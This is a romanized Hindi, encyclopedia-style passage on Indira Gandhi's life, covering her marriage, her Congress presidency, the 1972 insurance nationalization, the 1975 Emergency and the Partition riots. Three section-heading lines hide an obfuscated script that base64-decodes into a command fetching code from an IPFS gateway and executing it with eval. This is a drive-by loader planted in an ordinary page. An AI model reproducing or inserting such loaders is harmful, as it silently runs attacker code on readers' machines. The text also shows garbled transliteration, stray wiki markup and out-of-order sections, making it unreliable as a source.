prem ki bhavana ka uday iandira ke hriday mean bhi hua tha. parasi yuvak firoz gaandhi se iandira ka parichay us samay se tha jab vah anand bhavan mean ek svatantrata senani ki tarah ate tha. firoz gaandhi ne kamala neharoo ko mata man diya tha. jarmani mean jab kamala neharoo ko chikitsa ke lie le jaya gaya tab firoj mitrata ka pharj poora karane ke lie jarmani pahuanch ge tha. landan se bharat vapasi ka prabandh bhi firoj ne ek sainik jahaz ke madhyam se kiya tha donoan ki mitrata is had tak paravan chadhi ki vivah karane ka nishchay kar liya. aisa mana jata hai ki kamala neharoo jivit hotian to is shadi ko asani ke sath svikriti mil sakati thi. kamala ji apane pati ko shadi ke lie vivash kar sakati thian. lekin kamala neharoo unaki madad karane ke lie duniya mean nahian thian. iandira ji chahati thian ki us shadi ko pita ka ashirvad avashy prapt ho lekin pandit neharoo ko us shadi ke lie mana pana asanbhav nahian to kathin avashy tha. vaise firoz gaandhi ko hi iandira se shadi karane ka prastav pandit neharoo ke samane rakhana chahie tha lekin firoj yah himmat nahian kar pae. usane yah dayitv iandira ko hi sauanp diya. iandira ne firoz gaandhi ko shadi ka vachan de diya tha.

rajaniti

[[chitr:Radhakrishnan-Indira-Gandhi-Kamaraj.jpg|thumb|right|250px|d aau. sarvapalli radhakrishnan, iandira gaandhi evan kumarasvami kamaraj]]

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

iandira priyadarshini ko parivar ke mahaul mean rajanitik vicharadhara virasat mean prapt huee thi. yahi karan hai ki pati firoz gaandhi ki mrityu se poorv hi iandira gaandhi pramukh rajanitijn ban gee thian. kaangres parti ki karyakarini mean inaka chayan 1955 mean hi ho gaya tha. vah kaangres sansadiy mandal ki bhi sadasya rahian. pandit neharoo inake sath rajanitik paramarsh karate aur un paramarshoan par amal bhi karate the.
iandira gaandhi ko rajanitik roop se age badhane ke arop us samay pandit neharoo par lage. 1959 mean jab iandira ko kaangres ka adhyaksh banaya gaya to kee alochakoan ne dabi juban se pandit neharoo ko parti mean parivaravad phailane ka doshi thaharaya tha. lekin ve alochana itane mukhar nahian the ki unaki batoan par tavajjo di jati. vastutah iandira gaandhi ne samaj, parti aur desh ke lie mahattvapoorn kary kie the. unhean aantarrashtriy star par pahachan prapt thi. videshi rajanayik bhi unaki prashansa karate the. is karan alochana doodh mean uthe jhag ki tarah baith gee. kaangres adhyaksha ke roop mean iandira gaandhi ne apane kaushal se kee samasyaoan ka nidan kiya. unhoanne nari shakti ko mahattv dete hue unhean kaangres parti mean mahattvapoorn pad pradan kie. yuva shakti ko lekar bhi unhoanne abhootapoorv nirnay lie. iandira gaandhi 42 varsh ki umr mean kaangres adhyaksha bani thian.

desh ka vikas

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

pakistan se yuddh ke bad iandira gaandhi ne apana sara dhyan desh ke vikas ki or keandrit kar diya. sansad mean unhean bahumat prapt tha aur nirnay lene mean svatantrata thi. unhoanne aise udyogoan ko rekhaankit kiya jinaka kushal upayog nahian ho raha tha. unamean se ek bima udyog tha aur doosara koyala udyog. bima kanpaniyaan bhari munapha arjit kar rahi thian. lekin unaki pooanji se desh ka vikas nahian ho raha tha. vah pooanji niji hathoan mean ja rahi thi. bima kanpaniyoan ke niyamoan mean paradarshita ka abhav hone ke karan janata ko vaise labh nahian prapt ho rahe the, jaise hone chahie the. lihaza agast, 1972 mean bima karobar ka rashtriyakaran kar diya gaya.

apatakal

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

15 joon, 1975 ko je.pi. aur samarthik vipaksh ne aandolan ko ugr roop de diya. sath hi yah tay kiya gaya ki poore desh mean savinay avajna andolan chalaya jae aur pradhanamantri avas ko bhi gher liya jae. avas mean maujood logoan ko nazaraband karake kisi ko bhi aandar pravisht n hone diya jae. inhian paristhitiyoan ke karan pradhanamantri iandira gaandhi ne 25 joon, 1975 ko tatkalin rashtrapati fakharuddin ali ahamad se apatakal lagoo karane ki hastaksharit svikriti prapt kar li. is prakar 26 joon, 1975 ki pratah desh mean apatakal ki ghoshana kar di gee. apatakal lagoo hone ke bad jayaprakash narayan, moraraji desaee aur any saik doan chhote-b de netaoan ko giraftar karake jel mean dal diya gaya. aisa mana jata hai ki apatakal ke dauran ek lakh vyaktiyoan ko desh ki vibhinn jeloan mean band kiya gaya tha. inamean matr rajanitik vyakti hi nahian, aparadhik pravritti ke log bhi the jo aise aandolanoan ke samay lootapat karate haian. sath hi bhrasht kalabazariyoan aur histrishitar aparadhiyoan ko band kar diya gaya.

desh ka vibhajan

thumb|250px|left|iandira gaandhi stamp us samay desh vibhajan ke kinare par tha. jinna ke netritv mean muslim lig ne pakistan ki maang ki thi aur aangrez bhi jinna ki maang ko spasht hava de rahe the lekin gaandhiji vibhajan ke paksh mean nahian the. l aaurd mauantabetan kootaniti ka khel khelane mean lage hue the. vah ek or mahatma gaandhi ko ashvast kar rahe the ki desh ka vibhajan nahian hoga to doosari or pandit neharoo se kah rahe the ki do rashtroan ke vibhajan ke ph aaurmoole par hi azadi pradan ki jaegi. pandit neharoo sthiti ki ganbhirata ko samajh rahe the jabaki mahatma gaandhi is bhram mean the ki aangrez vayasaray vibhajan nahian chahata hai. jinna ki anuchit maang ke karan hindoo aur musalamanoan mean vaimanasy pasar gaya tha. mahattvakaankshi jinna pakistan ka pradhanamantri banane ke lie bahut lalayit the. mahatma gaandhi ne jinna ko sanpoorn aur akhand bharat ka pradhanamantri banane ka ashvasan diya. lekin jinna yah janate the ki pandit neharoo ke karan yah sanbhav nahian hai. hindoo kisi bhi muslim ko pradhanamantri ke roop mean svikar nahian kareange. aise mean desh saanpradayik dangoan ki ag mean jhulasane laga tha. mahatma gaandhi kisi tarah dangoan ki ag shaant karana chahate the. dilli mean bhi kee sthanoan par iansaniyat sharmasar ho rahi thi. tab mahatma gaandhi ne iandira ji ko yah muhim sauanpi ki vah dangagrast kshetroan mean jakar logoan ko samajhaean aur aman lautane mean madad karean.

dangagrast kshetroan ka daura

iandira gaandhi ne phir mahatma gaandhi ke adesh ko shirodhary kiya aur dangagrast kshetroan mean donoan samudayoan ke logoan ko samajhane ka prayas karane lagian. vastutah yah atyant jokhim kary tha. pandit neharoo ki beti hone ke karan ativadi unhean nuqasan pahuancha sakate the parantu nirbhik iandira ne dangoan ki ag shaant karane ke lie purazor prayas kie. lekin 15 agast ke bad saanpradayikata apane charam par pahuanch gee. dangoan mean donoan samudayoan ke anaginat log maut ke ghat utar die ge. pakistan se lakhoan sharanarthi dilli a ge the. sharanarthiyoan ke punarvas ka saval bhi utpann ho gaya tha. un bhookhe-pyase ghar se bhage logoan ke lie prathamik avashyakataean bhi jaroori thian. aisi sthiti mean dilli ke kee sthanoan par sharanarthi evan danga pi dit shivir lagae ge the. pandit neharoo ne 17, park rod ke apane bangale par bhi sharanarthi shivir lagae. sharanarthiyoan ke jivan ki buniyadi suvidhaoan ka dhyan rakha ja raha tha. us samay mahatma gaandhi pashchim bangal ke noakhali zile mean jahaan muslimoan ki kee bastiyoan ko jala diya gaya tha. pakistan se ane vali trenoan mean hazaroan hinduoan ki lashean bhi a rahi thian. is karan hindoo akroshit hokar musalamanoan par hamala kar rahe the.

ghar mean sharanarthi shivir
